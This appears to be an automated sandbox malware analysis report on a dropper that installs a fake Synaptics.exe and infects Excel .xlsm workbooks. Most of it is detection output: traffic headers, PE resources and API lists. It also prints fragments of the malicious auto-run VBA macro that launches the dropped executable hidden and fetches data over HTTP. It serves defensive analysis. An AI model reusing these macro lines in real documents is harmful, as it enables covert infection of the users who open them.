                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:08 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-uMlQArwHy6BFFaruVfQNGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:08 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-m0HeFW7NJHeUylE5RNHkBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:08 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-X4yMWrjJoXpLI0FTu6fMEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:08 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-poTjzuFDHdPjiZ0xJ+fNWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:09 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-V9sp8855eWTTTYLOXnw16A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *.google.com*.appengine.google.com*.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleadapis.com*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnrecaptcha-cn.net*.recaptcha-cn.netwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.comdeveloper.android.google.cndevelopers.android.google.cnsource.android.google.cn equals www.youtube.com (Youtube)
                              Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49732 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49733 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49741 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49880 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49922 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49981 version: TLS 1.2
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00407686 GetKeyboardState,0_2_00407686
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_0040761E GetClipboardData,0_2_0040761E
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_00429040 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,5_2_00429040
                              Source: Synaptics.exe, 00000002.00000002.499105477.00000000007DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                              System Summary

                              barindex
                              Document contains an embedded VBA with functions possibly related to ADO stream file operations
                              Source: 9wmK2oZj.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: KLIZUSIQEN.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                              Source: 9wmK2oZj.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: KLIZUSIQEN.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Document contains an embedded VBA with functions possibly related to HTTP operations
                              Source: 9wmK2oZj.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: KLIZUSIQEN.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Document contains an embedded VBA macro with suspicious strings
                              Source: 9wmK2oZj.xlsm.2.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: 9wmK2oZj.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: 9wmK2oZj.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: 9wmK2oZj.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: 9wmK2oZj.xlsm.2.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: 9wmK2oZj.xlsm.2.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: 9wmK2oZj.xlsm.2.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: 9wmK2oZj.xlsm.2.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: 9wmK2oZj.xlsm.2.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: 9wmK2oZj.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: 9wmK2oZj.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: KLIZUSIQEN.xlsm.2.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: KLIZUSIQEN.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: KLIZUSIQEN.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: KLIZUSIQEN.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: KLIZUSIQEN.xlsm.2.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: KLIZUSIQEN.xlsm.2.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: KLIZUSIQEN.xlsm.2.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: KLIZUSIQEN.xlsm.2.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: KLIZUSIQEN.xlsm.2.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: KLIZUSIQEN.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: KLIZUSIQEN.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6508 -s 10424
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C830C01_2_00C830C0
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C871F01_2_00C871F0
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CA12711_2_00CA1271
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C874F01_2_00C874F0
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00D0F5F71_2_00D0F5F7
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00D087EC1_2_00D087EC
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C928C01_2_00C928C0
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CFFAC01_2_00CFFAC0
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C8AA001_2_00C8AA00
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C8FED01_2_00C8FED0
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C8FE601_2_00C8FE60
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_004601F02_2_004601F0
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0046C7CC2_2_0046C7CC
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0048C7F42_2_0048C7F4
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0044EA402_2_0044EA40
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_00496E182_2_00496E18
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0046B1E42_2_0046B1E4
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0045FCC82_2_0045FCC8
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_00453DA42_2_00453DA4
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_004601F05_2_004601F0
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0046C7CC5_2_0046C7CC
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0048C7F45_2_0048C7F4
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0044EA405_2_0044EA40
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_00496E185_2_00496E18
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0046B1E45_2_0046B1E4
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0045FCC85_2_0045FCC8
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_00453DA45_2_00453DA4
                              Source: A1FsbRkm5m.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                              Source: ._cache_A1FsbRkm5m.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: ._cache_A1FsbRkm5m.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: ._cache_A1FsbRkm5m.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                              Source: RCX4F28.tmp.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                              Source: ~$cache1.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeSection loaded: starttiledata.dllJump to behavior
                              Source: A1FsbRkm5m.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: String function: 00D0155A appears 80 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00406CDC appears 32 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004049E4 appears 40 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 0049058C appears 112 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00404A58 appears 34 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004109E8 appears 68 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004049C0 appears 117 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004865B4 appears 38 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00486788 appears 32 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004070F0 appears 168 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00404CCC appears 108 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004967D4 appears 36 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00403F78 appears 32 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 0040F7A4 appears 42 times
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: String function: 004109E8 appears 35 times
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: String function: 004049C0 appears 84 times
                              Source: 9wmK2oZj.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: 9wmK2oZj.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: KLIZUSIQEN.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: KLIZUSIQEN.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_0045A054
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0043F118 NtdllDefWindowProc_A,GetCapture,2_2_0043F118
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_004598AC NtdllDefWindowProc_A,2_2_004598AC
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,2_2_0045A054
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,2_2_0045A104
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,2_2_0045E9EC
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,73CCB080,SaveDC,RestoreDC,NtdllDefWindowProc_A,2_2_0044EA40
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0042F60C NtdllDefWindowProc_A,2_2_0042F60C
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0043F118 NtdllDefWindowProc_A,GetCapture,5_2_0043F118
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_004598AC NtdllDefWindowProc_A,5_2_004598AC
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,5_2_0045A054
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,5_2_0045A104
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,5_2_0045E9EC
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,5_2_0044EA40
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0042F60C NtdllDefWindowProc_A,5_2_0042F60C
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CFE360: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle,1_2_00CFE360
                              Source: A1FsbRkm5m.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: A1FsbRkm5m.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ._cache_A1FsbRkm5m.exe.0.drStatic PE information: Resource name: CAB type: Microsoft Cabinet archive data, 1381208 bytes, 3 files
                              Source: ._cache_A1FsbRkm5m.exe.0.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, 304652 bytes, 1 file
                              Source: ._cache_A1FsbRkm5m.exe.0.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, 348915 bytes, 1 file
                              Source: ._cache_A1FsbRkm5m.exe.0.drStatic PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, 9658 bytes, 1 file
                              Source: ._cache_A1FsbRkm5m.exe.0.drStatic PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, 11495 bytes, 1 file
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX4F28.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: A1FsbRkm5m.exeBinary or memory string: OriginalFileName vs A1FsbRkm5m.exe
                              Source: A1FsbRkm5m.exe, 00000000.00000003.275171850.000000000483C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs A1FsbRkm5m.exe
                              Source: A1FsbRkm5m.exe, 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename360Installer.exe> vs A1FsbRkm5m.exe
                              Source: A1FsbRkm5m.exe, 00000000.00000003.278297715.0000000000B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs A1FsbRkm5m.exe
                              Source: A1FsbRkm5m.exe, 00000000.00000002.282046497.0000000000B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs A1FsbRkm5m.exe
                              Source: A1FsbRkm5m.exe, 00000000.00000000.268798160.00000000007ED000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs A1FsbRkm5m.exe
                              Source: A1FsbRkm5m.exe, 00000000.00000003.281143563.00000000024E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs A1FsbRkm5m.exe
                              Source: A1FsbRkm5m.exe, 00000000.00000003.275132834.000000000482A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename360Installer.exe> vs A1FsbRkm5m.exe
                              Source: A1FsbRkm5m.exe, 00000000.00000003.278179873.0000000000B38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs A1FsbRkm5m.exe
                              Source: A1FsbRkm5m.exe, 00000000.00000003.281202187.0000000000B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs A1FsbRkm5m.exe
                              Source: A1FsbRkm5m.exe, 00000000.00000003.277496763.00000000068F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename360Installer.exe> vs A1FsbRkm5m.exe
                              Source: A1FsbRkm5m.exe, 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs A1FsbRkm5m.exe
                              Source: ._cache_A1FsbRkm5m.exeBinary or memory string: OriginalFilename vs A1FsbRkm5m.exe
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilename360Installer.exe> vs A1FsbRkm5m.exe
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545872616.0000000067C76000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenamesites.dll0 vs A1FsbRkm5m.exe
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename360P2SP.dllH vs A1FsbRkm5m.exe
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename360P2SP.dll0 vs A1FsbRkm5m.exe
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.546053160.0000000067F3F000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename360P2SP.dllH vs A1FsbRkm5m.exe
